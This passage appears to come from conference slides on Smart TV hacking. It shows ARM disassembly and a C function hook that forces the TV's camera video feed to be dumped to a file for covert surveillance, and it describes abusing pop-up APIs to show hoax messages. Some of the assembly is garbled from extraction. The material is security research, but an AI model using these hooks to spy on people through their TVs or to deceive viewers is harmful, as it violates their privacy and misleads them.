- CMoIPBuffer::Read() sounds very good
- Dumping buffer and saving it into a file
- But a better way at StartRenderer()

```
LDR     R12, =(_GLOBAL_OFFSET_TABLE_ - 0x263FFD8)
MOV     R1, #3
LDR     R2, =(aCmoipvideof_18 - 0x66E91E8)
ADD     R12, PC, R12 ; _GLOBAL_OFFSET_TABLE_
STMFD   SP!, {R3,R4,R11,LR}
ADD     R2, R12, R2
MOV     R4, R0
LDR     R3, [R0,#0x58]
ADD     R11, SP, #0xC
MOV     R0, #5
BL      _ZN7CCDebug5PrintI11CCDebugMoIPDEvmmPKcz
MOV     R0, R4
BL      _ZN16CMoIPVideoFeeder10InitializeEv
MOV     R3, #1
MOV     R0, R4
STRB    R3, [R4,#0x66]
BL      _ZN16CMoIPVideoFeeder11t_StartDumpEv
LDMFD   SP!, {R3,R4,R11,PC}
```
SUB    R6, R11, # -s  \( \rightarrow \) GOOD_LOCAION
LDR    R1, = (aMtd_rwcommonFe - 0x66E91E8)
LDR    R2, [R0, #0x58]
ADD    R1, R4, R1
MOV    R0, R6
BL     sprintf
LDR    R1, = (aAmrWb+4 - 0x66E91E8)
MOV    R0, R6
ADD    R1, R4, R1
BL     fopen
LDR    R2, = (aCmoipvideof_12 - 0x66E91E8)
LDR    R3, [R5, #0x58]
MOV    R1, #3
ADD    R2, R4, R2
STR    R0, [R5, #0xC]
MOV    R0, #5
BL     _ZN7CCDebug5PrintI11CCDebugMoIPEEvmmPKcz
B      loc_263F158
Thank you for the code, dev!

- So, if we set arg1 + 0x1c to not 0, the program saves the buffer into a file
- Alright, we do this by patching again

```c
int hooked_func(unsigned int a) {
    unsigned int *p, value;
    int (*my_func)(unsigned int b);
    printf("hooked CMoIPVideoFeeder::StartRenderer\n");
    value = *(int *)(a+28);
    p = a+28;
    *p = 1;
    my_func = (void*) hook_info.orig;
    hook_precall(&hook_info);
    value = my_func(a);
    hook_postcall(&hook_info);
    return value;
}
```
We have a video file, then?

- We now have a video file
  - We could just send it to us and open it
- But we made a streaming for show
- Now.. Go for DEMO!
Deceiving victims

- Do you remember that AP twitter account got hacked?

![Twitter Post]

- The stock points went down

The Dow Jones industrial average plunged more than 130 points, or roughly 1 percent, after the fake Twitter posting before quickly rebounding. As of 1:50 p.m., it was up 130 points, or 0.9 percent, to 14,698. The S&P 500 and Nasdaq also fell sharply, but recovered after AP confirmed that the tweets were false.

http://www.cbsnews.com/
Hoax on Smart TV

- It’s also possible to make hoax on Smart TV
- There are many APIs that show movies, images and text on TV
Popup API

- There are some APIs for popping text
- We choose CCDrawing::Show()
  - Alternatives (CCButton::TextDrawing, etc)

```
.text:02042C78 ; CCDrawing::Show(void)
.text:02042C78 EXPORT _ZN9CCDrawing4ShowEv
.text:02042C78 _ZN9CCDrawing4ShowEv
.text:02042C78
.text:02042C78 STMFD SP!, {R4-R7,R11,LR}
.text:02042C7C ADD R11, SP, #0x14
.text:02042C80 MOV R4, R0
.text:02042C84 BL pthread_self
.text:02042C88 LDR R6, [R4,#0x18]
.text:02042C8C LDR R7, [R6,#0x20]
.text:02042C90 LDR R3, [R7,#0xC]
.text:02042C94 CMP R3, R0
.text:02042C98 MOV R5, R0
.text:02042C9C BEQ loc_2042D34
.....
```
Showing hoax

- To use Popup APIs is actually not simple
- There are small components for a box
  - Label, button, etc
- Each component should be filled with correct information
  - Position, font and other properties
- We show a demo
  - And the code will be released after this conference
Conclusion

- Smart TV hacks probably doesn’t make money like Smartphone hacks
- But personal privacies are very important
- And Smart TV is a perfect target for surveillance
  - Power is connected
  - Camera and voice sensors
  - Can be located at very privacy places
  - Almost no noise while running
- It’s now getting used more and more in office environments, Smart TV security should be considered for security policy
Conclusion

- Deceiving Smart TV users is also a good spot to research
  - As the case of hacked AP twitter account
- We’re planning to release all code
  - Surveillance Rootkits
  - Hoax tools
- You can find updated slides here
  - http://grayhash.com
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